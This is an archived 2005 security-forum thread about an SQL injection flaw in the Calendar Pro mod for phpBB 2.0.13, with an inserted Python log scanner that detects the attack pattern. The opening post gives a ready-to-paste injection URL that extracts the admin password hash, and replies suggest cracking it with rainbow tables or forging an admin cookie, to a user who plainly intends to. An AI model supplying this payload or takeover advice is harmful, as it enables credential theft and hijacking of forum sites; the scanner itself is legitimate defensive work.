Waraxe IT Security Portal  
Another one! Phpbb 2.0.13 + Calendar Mod
Posted: Tue Apr 05, 2005 10:11 pm, by murdock (Advanced user; joined Mar 16, 2005; posts: 54)

Another SQL injection has been discovered in another mod for phpbb 2.0.13, published at milw0rm's page and found by Cerebrums again.
Now it seems to be in the "Calendar Pro" mod (NOTE: Not the "Topic Calendar" mod!).

Here's the exploit:

http://www.milw0rm.com/id.php?id=910

But, once again, I prefer to simply paste the injection url in the browser:

Code:
http://[target]/[phpbb_folder]/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*


This one gives the admin password hash; simply change the "user_id=" number to get the hash of another user.

I made a screenshot to show where the hash appears in the page if the exploit worked: Screenshot

Salut!
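
A defensive check for the request pattern described in the post above, as an added example that is not part of the original thread: it scans web-server access logs for requests to cal_view_month.php whose parameters are not plain integers. It assumes that month, year and category are integer-valued and that the server writes combined-format logs; the log lines, client IPs and the /forum/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format). Client IPs are from
# documentation ranges and the /forum/ path is an assumption for the example.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2005:09:12:01 +0000] "GET /forum/cal_view_month.php'
    '?month=04&year=2005&category=3 HTTP/1.1" 200 8120',
    '198.51.100.7 - - [06/Apr/2005:09:13:44 +0000] "GET /forum/cal_view_month.php'
    '?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20'
    'phpbb_users%20where%20user_id=2/* HTTP/1.1" 200 8342',
    '192.0.2.10 - - [06/Apr/2005:09:14:02 +0000] "GET /forum/viewtopic.php?t=12 '
    'HTTP/1.1" 200 15310',
    '203.0.113.5 - - [06/Apr/2005:09:15:30 +0000] "GET /forum/cal_view_month.php'
    '?month=abc&year=2005&category=1 HTTP/1.1" 200 7990',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_PARAMS = ("month", "year", "category")   # assumed to be integer-valued
INTEGER_RE = re.compile(r"-?\d{1,6}")
SQL_TOKENS = re.compile(r"\b(?:union|select|from|where)\b|/\*|--", re.I)

def check_line(line):
    """Return (param, decoded_value, reason) findings for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/cal_view_month.php"):
        return []
    findings = []
    # parse_qs percent-decodes values, so %20-encoded payloads are compared in clear
    params = parse_qs(url.query, keep_blank_values=True)
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if INTEGER_RE.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in check_line(line)]

if __name__ == "__main__":
    for number, (param, value, reason) in scan(SAMPLE_LOG):
        print(f"line {number}: {param}={value!r} ({reason})")
```

The durable fix is in the mod itself: cast these parameters to integers before they reach the query.
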

Posted: Wed Apr 06, 2005 3:08 am, by xtremeshell (Regular user; joined Mar 21, 2005; posts: 6; location: Somewhere In Hell !!)

"This one gives the admin password hash; simply change the "user_id=" number to get the hash of another user."
=================================================
After I have the admin hash, how do I crack it? (Sorry for my stupid questions.) Should I use some software, such as JTR? Or simply, how to exploit the admin panel with that admin hash?

Thx

Posted: Wed Apr 06, 2005 7:25 am, by murdock (Advanced user; joined Mar 16, 2005; posts: 54)

You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).

Posted: Wed Apr 06, 2005 8:11 am, by xtremeshell (Regular user; joined Mar 21, 2005; posts: 6; location: Somewhere In Hell !!)

murdock wrote:
You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).


Mm... Rainbow Tables? :) I'll find it... And maybe I'll prefer to use the hash as a cookie, maybe? Hehehe... Well, let's go!

Thx for the reply :)

Posted: Wed Apr 06, 2005 11:45 am, by shai-tan (Valuable expert; joined Feb 22, 2005; posts: 477)

Why can't people just put their time into phpBB itself? There's not many sites that I've seen that use the calendar and download mods. Everyone is happy if there is an exploit for 2.0.13 itself... well, except the victims.

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Wed Apr 06, 2005 12:58 pm, by waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

shai-tan wrote:
...
Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.
:lol:

Yeah, sure, webmasters and admins are not pleased with new defacement waves :D

Anyway - phpbb is already a very researched piece of software and new security holes are harder and harder to find ;)

Posted: Wed Apr 06, 2005 1:15 pm, by shai-tan (Valuable expert; joined Feb 22, 2005; posts: 477)

Yes, well, we are just going to have to wait till 3.0 comes out :twisted: ... I remember all the posts long ago about how secure 2.0.0 was going to be... now look at it... :lol:


Posted: Wed Apr 06, 2005 2:28 pm, by waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

Yep, all the new, rewritten-from-scratch versions are a good target for security audit, that's true 8)

Posted: Wed Apr 06, 2005 3:03 pm, by y3dips (Valuable expert; joined Feb 25, 2005; posts: 281; location: Indonesia)

waraxe wrote:
Anyway - phpbb is already a very researched piece of software and new security holes are harder and harder to find ;)


Yes, I've seen so many security holes being found in phpBB, but now I think it is more and more secure, because there have been so many fixes since it was born, lol.

So now the attacks will be against the modules in the forum, like PHPnuke, I think :roll:

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Fri Apr 08, 2005 12:25 pm, by shai-tan (Valuable expert; joined Feb 22, 2005; posts: 477)

Yes, phpNuke I think is in for an exploit spell. It's too big. Small and simple things are always the most secure ;)


Posted: Fri Apr 08, 2005 3:02 pm, by waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

shai-tan wrote:
Yes, phpNuke I think is in for an exploit spell. It's too big. Small and simple things are always the most secure ;)


Phpnuke is a really amazing piece of software - very big and strong community, very ineffective and insecure coding (kinda bloatware). It contains many, many legacy code fragments, absolutely not used nowadays. And what's worse - all those add-ons and stuff - most of them are examples of insecure coding. There are good derivations of phpnuke - like cpgnuke and stuff - but I think it's time to rewrite phpnuke from scratch - why not as version 8.0 :idea:
By the way - I use phpnuke myself (as you all can see 8) ) and it's my own derivation, the so-called "waraxe edition". I was optimizing the nuke core engine and all the modules, and performance was growing 200%-300%.
Just look at page generation times and compare them to other, classical nuke sites :D

Posted: Fri Apr 08, 2005 3:19 pm, by wyk (Regular user; joined Mar 15, 2005; posts: 10)

waraxe, are you ready to share this derivation with others?

Posted: Fri Apr 08, 2005 3:35 pm, by waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

wyk wrote:
waraxe, are you ready to share this derivation with others?


It's at an early stage. I still have not finished the modules "downloads", "weblinks" and "votes". And there is more stuff to finish. Maybe I will release it in the near future, let's see.
But one thing is sure - my nuke derivation is meant to be as secure as possible (for nuke :D ). Right now there are implemented countermeasures against path disclosure, some obstacles against SQL injections, and all suspicious activity and all internal errors will be logged. And so far - since January 2005 - it has not fallen apart yet :)
So it seems that the waraxe edition alpha release is coming out before summer 2005 ;)

Posted: Fri Apr 08, 2005 4:40 pm, by y3dips (Valuable expert; joined Feb 25, 2005; posts: 281; location: Indonesia)

I just think about that sometimes, because we all know phpnuke has a big community. Why doesn't phpnuke make a restriction on modules, or maybe all included modules should have some 'security test' and a permit from them?

waraxe: about your own modification, I think it would be great if you can share it, and better if you post one to the "php nuke" developers so they could learn from it. Can't wait for it.


Posted: Sat Apr 09, 2005 4:53 am, by shai-tan (Valuable expert; joined Feb 22, 2005; posts: 477)

Yes it will be very popular. I want a beta now to be honest.
Why not call it Php-Waraxe-Nuke or just Waraxe-Nuke. Then we can tell Php-Nuke.org to shove 8.0 up their A*s

All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"